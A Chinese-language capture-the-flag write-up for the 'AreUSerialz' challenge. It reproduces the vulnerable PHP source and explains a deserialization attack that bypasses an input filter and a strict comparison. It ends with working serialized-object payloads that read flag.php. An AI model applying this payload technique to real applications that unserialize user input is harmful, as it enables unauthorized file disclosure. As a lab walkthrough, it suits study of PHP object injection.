AreUSerialz
1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
2.再仔细读一下类的结构,在反序列化时首先会调用__destruct()函数,__destruct()会检测op值是否为'2',如果为'2'就会令op=1,由于是===必须是类型和数值都等于'2',所以可以让op等于数字2来绕过,然后__destruct()会调用process(),process()中如果op值为2将会执行read()函数,会读取fliename的文件,所以我们需要将op=2,filename='flag.php'进行序列化,序列化结果为O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;},但是无法成功,说明需要知道绝对路径。
3.我们可以利用不完整的序列化使析构函数提前执行,就可以在当前目录下直接读取flag,将序列化结果最后一个大括号去掉。最终payload为O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;